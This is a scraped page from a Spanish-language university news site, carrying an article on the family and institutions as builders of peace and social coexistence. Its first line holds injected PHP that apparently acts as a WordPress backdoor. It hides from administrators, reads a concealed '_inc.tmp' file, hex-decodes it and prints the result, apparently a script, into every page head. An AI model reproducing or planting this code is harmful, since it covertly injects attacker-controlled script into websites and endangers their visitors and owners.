if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Familia e instituciones responsables de la articulación de la convivencia social – La Opinión Universitaria La Opinión Universitaria
Menu

Familia e instituciones responsables de la articulación de la convivencia social

Los eventos que turban la seguridad de las personas y que introducen ansiedad e incertidumbre son muchos y de diversa índole, y hay otros que nos hacen que nos cuestionemos si la paz es posible en un entorno complicado y que provocan que mucha gente esté a la defensiva ante cualquier situación.

En la construcción de la paz estamos implicados todos y no solo de forma individual, sino que incluye también a las diferentes instituciones, diferentes instancias que articulan la convivencia social, enfatizó Christian Duecker García, coordinador de la Licenciatura en Ciencias para la Familia en modalidad Online de la UPAEP.

Agregó que esta convivencia social va desde la convivencia personal, hasta un nivel familiar, desde la convivencia con los vecinos, en la comunidad y hasta un nivel poblacional y se puede observar la participación de múltiples actores y uno de los grandes objetivos del bien común es la de promover la paz en donde se pueda contribuir a la construcción de las personas como tal.

Duecker García señaló que las personas tienen una cierta inercia a pensar que la paz es un punto de llegada, fijo, estático, qué una vez conseguido, tendría que permanecer de esta manera.

Manifestó, “la paz como tal, exige de cada uno de nosotros a nivel individual, pero también en la medida en que participamos de grupos de instituciones, una continua tensión y dinámica para procurarla, para conservarla, para promoverla y difundirla, la paz de alguna manera no aparece como un estado final que se consigue y que de alguna manera una vez alcanzada nos permite que nos relajemos, sino por el contrario, nos invita a estar alertas, atentos y mirando las preocupaciones de los demás y las propias para poder generar las mejores condiciones”.

Subrayó que la familia es un espacio de trabajo, pero no en el sentido laboral, asalariado o de producción. La familia es un espacio de trabajo en donde se consiguen los bienes más fundamentales que se pueden aportar al bien común. Es un espacio en donde la verdad y la justicia como dimensiones fundamentales de las relaciones humanas, las relaciones sociales tendrían que comenzar a tener una presencia no abstracta sino concreta.

Refirió que la familia no vive sola y uno de los grandes desafíos que tiene la familia en nuestros tiempos es superar esa noción de familia que se encierra sobre sí misma.

Acotó, “todas las personas perciben que la vida de cada uno se enriquece con las amistades, con las relaciones genuinas de compromiso para lograr objetivos, nuestros intereses más legítimos, la consecución del bien común del que se quiere gozar y esto siempre se busca junto con otros. Porque la familia no puede vivir aislada del tejido social y el bien común se estructura con la participación de otras instituciones”.

Tweets recientes